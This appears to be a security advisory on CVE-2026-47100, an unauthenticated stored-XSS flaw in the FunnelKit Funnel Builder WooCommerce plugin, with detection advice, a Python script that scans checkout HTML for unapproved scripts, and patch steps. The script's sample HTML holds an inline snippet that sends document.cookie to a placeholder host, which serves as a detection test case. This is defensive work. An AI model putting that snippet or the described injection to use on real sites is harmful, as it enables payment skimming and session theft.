CVE-2026-47100 Overview
CVE-2026-47100 is a missing authorization vulnerability [CWE-862] in the Funnel Builder for WooCommerce Checkout plugin prior to version 3.15.0.3. The plugin's public checkout AJAX endpoint fails to validate caller permissions before invoking internal methods. Unauthenticated attackers can write arbitrary data to the plugin's External Scripts global setting. This setting is rendered into the storefront, so injected JavaScript executes in the browser of every checkout page visitor. The flaw enables stored cross-site scripting (XSS) against shoppers, including payment data skimming and session theft. Sansec has reported active exploitation campaigns targeting affected WooCommerce stores.
Critical Impact
Unauthenticated attackers can inject persistent JavaScript into the checkout page, exposing every shopper to credential theft, payment skimming, and account takeover.
Affected Products
- Funnel Builder for WooCommerce Checkout (FunnelKit) versions prior to 3.15.0.3
- WordPress sites running WooCommerce with the vulnerable plugin enabled
- All site visitors interacting with checkout pages on affected installations
Discovery Timeline
- 2026-05-19 - CVE-2026-47100 published to NVD
- 2026-05-19 - Last updated in NVD database
Technical Details for CVE-2026-47100
Vulnerability Analysis
The vulnerability resides in the plugin's AJAX controller, class-wfacp-ajax-controller.php, which is registered to handle requests from the public checkout flow. The controller exposes a dispatcher that routes incoming requests to internal methods based on attacker-controlled parameters. Because the dispatcher does not enforce a capability or nonce check, any unauthenticated visitor can invoke privileged internal methods intended only for administrators. One such method writes values directly into the plugin's External Scripts global option, which the front end renders verbatim into the <head> of checkout pages.
Attackers leverage this primitive to store arbitrary JavaScript that executes for every subsequent checkout visitor. Reported exploitation activity uses the injection to load remote skimmer scripts that exfiltrate billing details, credit card numbers, and authentication cookies. Because the payload lives in a global option, a single request persists across all checkout pages until an administrator manually purges the setting.
Root Cause
The root cause is missing authorization on a public-facing AJAX endpoint. The controller resolves method names from request parameters and dispatches to them without confirming that the caller holds the manage_options capability or any equivalent privilege. Settings writers and read-only helpers share the same entry point, collapsing the trust boundary between unauthenticated shoppers and store administrators.
Attack Vector
Exploitation requires only network access to the target site. An attacker issues a single crafted POST request to the WordPress admin-ajax.php endpoint, specifying the vulnerable action and supplying JavaScript as the value of the External Scripts setting. No authentication, user interaction, or prior reconnaissance beyond plugin fingerprinting is required. Subsequent visits to the checkout page execute the injected script in each victim's browser session. See the VulnCheck Advisory for WooCommerce and the Sansec Research on FunnelKit Exploit for technical reproduction details.
Detection Methods for CVE-2026-47100
Indicators of Compromise
- Unexpected <script> tags or remote script src attributes rendered in the <head> of WooCommerce checkout pages.
- Non-empty or unfamiliar values in the plugin's External Scripts setting under FunnelKit configuration.
- Outbound requests from shopper browsers to attacker-controlled domains hosting skimmer payloads, as documented by Sansec.
Detection Strategies
- Audit the wp_options table for the FunnelKit External Scripts option and compare against a known-good baseline.
- Review web server access logs for POST requests to admin-ajax.php referencing FunnelKit actions from unauthenticated sessions.
- Scan rendered checkout HTML for inline JavaScript or external script tags that did not originate from approved integrations.
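As an added example (not part of this advisory or the plugin), the following script implements the third strategy above: it parses a rendered checkout page and reports script tags whose source host is outside an assumed per-site allowlist, plus any non-empty inline script. The allowlist, the sample HTML and its placeholder domains are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this store legitimately loads scripts from (assumption: tune per site).
APPROVED_HOSTS = {"js.stripe.com"}

# Constructed sample of a checkout <head>; the last two tags model an injected
# remote loader and an inline cookie-exfiltration snippet (placeholder domains).
SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="https://js.stripe.com/v3/"></script>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script src="//cdn-static.example.net/loader.js"></script>
<script>new Image().src='https://collect.example.net/?c='+document.cookie;</script>
</head><body></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect every <script> tag with its src attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._current = {"src": dict(attrs).get("src"), "inline": ""}

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data while the tag is open.
        if self._current is not None:
            self._current["inline"] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def suspicious_scripts(html, approved_hosts=APPROVED_HOSTS):
    """Return (kind, detail) pairs for external scripts off the allowlist and
    for every non-empty inline script; relative (same-origin) src is accepted."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for s in collector.scripts:
        if s["src"]:
            host = urlparse(s["src"]).hostname
            if host is not None and host not in approved_hosts:
                findings.append(("external", s["src"]))
        elif s["inline"].strip():
            findings.append(("inline", s["inline"].strip()))
    return findings
```

Every inline script is reported because the External Scripts setting is rendered verbatim into the page, so whatever legitimately lives there should be known exactly and can be added to a per-site baseline.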
Monitoring Recommendations
- Alert on modifications to WooCommerce plugin options, especially fields that accept raw HTML or script content.
- Monitor egress traffic from checkout pages for connections to newly registered or low-reputation domains.
- Track plugin version inventory across all WordPress sites to confirm 3.15.0.3 or later is deployed.
How to Mitigate CVE-2026-47100
Immediate Actions Required
- Update Funnel Builder for WooCommerce Checkout to version 3.15.0.3 or later on every affected site.
- Inspect the External Scripts setting and remove any value that was not placed there by an authorized administrator.
- Rotate WooCommerce admin credentials and customer session secrets if injection is confirmed.
- Notify customers and payment processors if cardholder data may have been exposed.
Patch Information
The vendor addressed the issue in Funnel Builder version 3.15.0.3 by adding authorization checks to the AJAX controller. The fix is documented in the WordPress Funnel Builder change on the plugin's Trac repository.
Workarounds
- Disable the Funnel Builder for WooCommerce Checkout plugin until the patched version is applied.
- Deploy a web application firewall (WAF) rule that blocks unauthenticated POST requests to admin-ajax.php targeting FunnelKit actions.
- Apply a Content Security Policy (CSP) on checkout pages to restrict script sources to a vetted allowlist.
# Verify installed plugin version on a WordPress host
wp plugin get funnel-builder --field=version
# Inspect the External Scripts option for unexpected content
wp option get wfacp_external_scripts
# Force upgrade to the patched release
wp plugin update funnel-builder --version=3.15.0.3
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.